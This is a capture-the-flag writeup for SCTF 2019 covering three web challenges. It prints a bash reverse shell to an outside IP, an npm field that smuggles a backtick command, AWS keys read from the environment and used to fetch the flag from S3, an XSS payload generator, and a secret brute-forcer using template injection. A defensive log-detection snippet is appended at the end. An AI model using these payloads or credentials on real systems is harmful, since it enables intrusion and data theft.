2019 sctf writeup

0x00 Preface

The most challenges I have solved in one event, but also the briefest and least complete writeup, :)

0x01 easy-php

https://sctf2019.l0ca1.xyz/static/js/app.51c756bc2bea67226d9b.js
First, look at the routing information in the source code

/main
/login
/upload

After that I found that accessing the main route directly works; the login can be bypassed.

One problem remains: how to modify the JS. The method is as follows.

First, configure the following in Burp.

Then capture the traffic with Burp and make sure to tick the option shown below.

Now the response can be modified: change the corresponding requireLogin: !0 to requireLogin: 0

After that you reach the main page.

Next, I found that npm supports installing packages from remote locations, which can lead to RCE.

{"key":"abcdefghiklmn123","npm":["jquery","http://`whoami`.bjslfd.ceye.io/z3.git"]}


Then bounce a shell straight back.

bash -i >& /dev/tcp/47.90.204.28/2333 0>&1

Seeing aws immediately brings S3-related issues to mind.

Read from the local environment variables:

AWS_ACCESS_KEY_ID=ASIA5CRTL2SNLRLBSRMQ
AWS_SECRET_ACCESS_KEY=QuqbcP2cl6uAPkSDH7qSP3bSMqHk7IwKVBTUhhn2
AWS_REGION=ap-northeast-1
AWS_SESSION_TOKEN=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


The session token here is essential; it must be written into the configuration file as well.

vim /root/.aws/credentials

Then just download the flag.

aws s3 cp s3://static.l0ca1.xyz/flaaaaaaaaag/flaaaag.txt ./flag.txt --region ap-northeast-1

0x02 math-is-fun1

Approach (math-is-fun2 uses the same payload; it works on the first try)
Use 2 to modify MathJax's configuration so that an arbitrary JS file gets loaded, then bring in a JSONP endpoint to achieve XSS.


#coding:utf-8

import sys

def getPayload(evaljs):
    # JSONP endpoint whose callback parameter is reflected into the response body
    p = "http://47.110.128.101/config?callback="
    # Encode the JS as a String.fromCharCode(...) call so the URL needs no quotes
    payload = 'eval(String.fromCharCode('
    payload += ",".join(str(ord(c)) for c in evaljs)
    payload += '));//'
    # %0a breaks out of the name parameter; MathJax['root'] is then pointed at the JSONP URL
    test = "http://47.110.128.101/challenge?name=abcd%0aMathJax[%27root%27]%3d"
    payload = test + p + payload + "%26/"
    print("[payload] " + payload)
    return payload


if __name__ == '__main__':
    # the JS to encode is the first command-line argument
    if len(sys.argv) < 2:
        print("usage: python %s '<javascript>'" % sys.argv[0])
        sys.exit(1)
    getPayload(sys.argv[1])

0x03 Flag Shop

import requests

# {SECRET} is replaced with each candidate below; name and do carry ERB tags that
# render $&, the text matched by the server's last regex, back into the page
url = "http://47.110.15.101/work?name=%3C%25%3d$%26%25%3E&do=%3C%25%3d$%26%25%3E+is+working&SECRET={SECRET}"

# prefix of the secret recovered so far
SECRET = "ec55ce17b51f7f2588b3d2f09c821e6499984b09810e652ce9fa4882fe4875c8"


headers = {
    "Cookie": "auth=eyJhbGciOiJIUzI1NiJ9.eyJ1aWQiOiJhMDc4ZDU3ZC0wZjZmLTRhNTItODE1MC0yMGYyOTkzYzkxMTUiLCJqa2wiOjI4fQ.gQnZDaa3pKpldiD07vWsX65SO4Ioz5ZawOy5xJPNSEU;"
}

zidian = "1234567890qwertyuiopasdfghjklzxcvbnm"  # candidate characters
for jj in range(30):
    for i in zidian:
        test = SECRET + i
        # test = i + SECRET
        crackUrl = url.replace("{SECRET}", test)
        text = requests.get(crackUrl, headers=headers).text
        # a correct prefix is echoed back as 'prefix followed by a space
        if ("'" + test + " " in text):
            SECRET = test
            print("[SECRET] " + SECRET)
            break
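As an added detection example (not part of the writeup), the traffic the script above generates, one client whose SECRET parameter to /work grows by one character each time a guess is accepted, can be picked out of a web access log. The log lines, client IPs and threshold are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined-format access log line: client IP first, then the quoted request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def make_line(ip, secret):
    # Constructed sample line (hypothetical IP and timestamp, placeholder name/do values).
    return (f'{ip} - - [01/Jun/2019:10:00:00 +0000] '
            f'"GET /work?name=x&do=y&SECRET={secret} HTTP/1.1" 200 512')

# Constructed sample traffic: 10.0.0.5 walks the secret one character at a time (wrong
# guesses keep the same length, each accepted guess is one character longer), while
# 10.0.0.9 sends an ordinary fixed value twice.
LADDER = ["1", "e", "e1", "ec", "ec3", "ec5", "ec5a", "ec55", "ec55b", "ec55c"]
SAMPLE_LOG = [make_line("10.0.0.5", g) for g in LADDER] + [make_line("10.0.0.9", "abc123")] * 2

def secret_values_by_client(lines):
    """Collect, per client IP and in arrival order, every SECRET value sent to /work."""
    per_client = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/work":
            continue
        for value in parse_qs(parts.query).get("SECRET", []):
            per_client[m.group("ip")].append(value)
    return per_client

def ladder_rungs(values):
    """Count the distinct lengths at which a value extends an earlier value by one character."""
    seen, rungs = set(), set()
    for v in values:
        if len(v) > 1 and v[:-1] in seen:
            rungs.add(len(v))
        seen.add(v)
    return len(rungs)

def detect_secret_ladder(lines, min_rungs=3):
    """Return {ip: (rungs, longest value tried)} for clients whose guesses form a ladder."""
    hits = {}
    for ip, values in secret_values_by_client(lines).items():
        rungs = ladder_rungs(values)
        if rungs >= min_rungs:
            hits[ip] = (rungs, max(values, key=len))
    return hits
```

A genuine secret of the length shown in the script would leave a ladder of dozens of rungs from a single client, which is far outside anything a normal user produces.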